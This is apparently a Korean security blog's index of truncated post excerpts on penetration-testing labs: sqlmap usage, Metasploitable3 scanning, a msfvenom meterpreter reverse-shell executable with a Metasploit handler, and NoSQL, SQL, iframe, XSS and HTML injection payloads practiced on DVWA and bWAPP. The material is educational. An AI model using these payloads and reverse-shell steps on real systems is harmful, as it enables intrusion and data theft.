건우Sec

SQLMAP 이란?sql injection 취약점을 사용하여 여러가지 SQL 문법들과 여러가지 조합들을 활용하고DB 서버 침투까지 지원하는 툴(TOOL) 이다.SQLMAP 사용법.sqlmap -u "http://example.com/page.php?id=1"-u 요청할 urlsqlmap -u "http://example.com/page.php?id=1" --dbs--dbs 데이터베이스 가져오기sqlmap -u "http://example.com/page.php?id=1" --tables -D database_name데이터 베이스 정보추출. sqlmap -u "http://example.com/page.php?id=1" --columns -D database_name -T table_name테이블 컬륨 확..

metasploitable3 환경 NMAP 스캔 및 취약점 nmap -sV -sC [IP]   취약점 설명 vsftpd 2.3.4 backdoor 백도어(backdoor) 취약점 이므로 원격으로 접속해 권한을 취득하거나 악성코드를 실행하는 방법이다 https://nordvpn.com/ko/blog/backdoor-attack-meaning/?srsltid=AfmBOopga12Kggkqj5drBUuLytCdgrjoH8eh7mYpK8GbvJ-_NYPht8v5 백도어 공격이란 무엇인가요?백도어는 일반적으로 컴퓨터, 제품, 모바일 장치 등에서 정상적인 인증 또는 암호화를 우회하는 접근 액세스입니다. 하지만 이러한 액세스를 악용하는 백도어 공격은 많은 사람을 위험에 빠뜨nordvpn.com  set RHOSTS ..

Metasploit & msfvenom 활용해 윈도우 10 모의침투.윈도우 10 방화벽 설정 설정관리 메뉴 클릭 이와 똑같이 다 끄기 Msfvenom 설정아래와 같이 작성 msfvenom -p windows/meterpreter/reverse_tcp LHOST=자신의 IP LPORT=4444 -f exe > 파일이름.exe  이런식으로 뜨면 성공 !  msfvenom 으로 만든 악성파일이 보임. Metasploit 설정 메타스플로잇 실행 모듈 설정 msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp  msf6 exploit(multi/handler) > set payload /windows/meter..

NoSQL Injection 이란?이름 그대로 NoSQL 기반에 공격이라고 생각하면 된다! SQL INJECTION 은 SQL 데이터베이스 기반으로 공격을 진행 했다면NoSQL INJECTION 은 다른 데이터베이스에게도 공격을 진행 할수있다 ( MongoDB ) 주입 공격 원리는 똑같다 NoSQL Injection cheat sheet MongoDB 쿼리 조작 { "username": "user" } { "username": { "$ne": null } } { "username": { "$in": ["user", "admin"] } } { "username": { "$gt": "" } } { "username": { "$lt": "" } } { "username": { "$regex": ".*" } }..

SQL INJECTION 이란? SQL 언어 injection 주입하다 SQL 인젝션은 데이터베이스에 취약한 부분을 노려 회원에 아이디 패스워드를알아내거나 관리자 계정을 우회할수 있는 걸 SQL INJECTION 이라고 한다. 이렇게 데이터베이스가 멍청하면 생기는 일이다. 직접 해커가 데이터베이스한테 명령을 내려ID 는 admin 인데 비닐번호는 password 야 어디있는지 알아? 정상인 데이터베이스는 입구컷하지만 멍청한 데이터베이스는 그대로 admin 사용자를 찾아 그대로 내준다 SQL INEJCTION 기법들1. 구문우회 기법 1. ' OR '1'='1--2. ' OR '1'='1' -- 3. ' OR '1'='1'/* 4. ' OR 1=1-- 5. ' OR 1=1# 6. ' OR 1=1-- 7. ..

IFRAME INJECTION 이란? HTML INJECTION 중 하나로.HTML 은 HTML 태그로 악성 스크립트를 삽입한다면 IFRAME 은 IFRAME 이라는 태그로 악성 스크립트를 삽입한다또한 IFRAME 태그는 HTML 내용 안에 또 다른 HTML 내용을 출력할 수 있는 태그이다  // 실습 //  LOW 단계 IFRAME INJECTION실습 페이지로 들어가자 여기서 위 링크 주소를 잘보면  http://192.168.142.131/bWAPP/iframei.php?ParamUrl=robots.txt&ParamWidth=250&ParamHeight=250 여기서 robots.txt 는  웹사이트의 어떤 부분을 크롤링할 수 있는지 지시하는 파일이다.쉽게 말하자면 출입된 구역이나 출입이허가 되지 ..

XSS 란? 웹페이지에 악성 스크립트를 삽입해 사용자의 개인정보를 뺴돌리거나신천지 사이트가 털렸던거처럼 디페이스 공격을 하는것을 XSS CROSS SITE SCRIPTING 이라 한다. XSS 공격기법도 다양하다 1. Reflected XSS 반사 조건으로 악성스크립트를 웹페이지에 삽입했을떄그대로 반사되는걸 우린 XSS 반사조건이라 한다또한 웹페이지 검색창에 악성스크립트를 삽입하여 피싱을 유도하거나 세션쿠키를 탈취할수 있다 2. Stored XSS 게시물에서 시작되며 게시물에 악성스크립트를 삽입하여다른이가 게시물을 클릭했을때 피싱으로 변질되거나 세션쿠키를 탈취할수 있다. 2가지 실습 본 실습은 DVWA에서 합니다. 1. Reflected XSS  자 우린 여기에 XSS 취약점이 있는지부터 확인할것이다. ..

HTML 인젝션이란? 웹 애플리케이션에 악의적인 HTML 코드를 웹 페이지에 삽입하는 기법이다. 두가지에 HTML 인젝션 공격기법이 있다 1. Reflected 반사조건 검색창에 악성 HTML 스크립트를 넣었을떄 생기는 취약점 공격이다. 이로 인해 사용자는 PC 에서 HTML 악성 코드가 실행되어서 피싱 , 세션쿠키탈취 등등 가능하다. 2. Stored 저장형 주로 게시물에서 발생하는데 게시물에 악의적인 HTML 스크립트를 삽입할떄 생기는 취약점이다 이로 인해 게시물을 누르는 사람은 HTML 악성 스크립트가 실행되 피싱 , 세션쿠키 탈취에 노출된다 [실습] 자 우리는 원하는건 HTML 인젝션을 활용하는 것이니.. 해킹 당했다는 문구를 한번 넣어볼것이다  자 이렇게 HTML 악성 스크립트를 넣어 해킹 당했..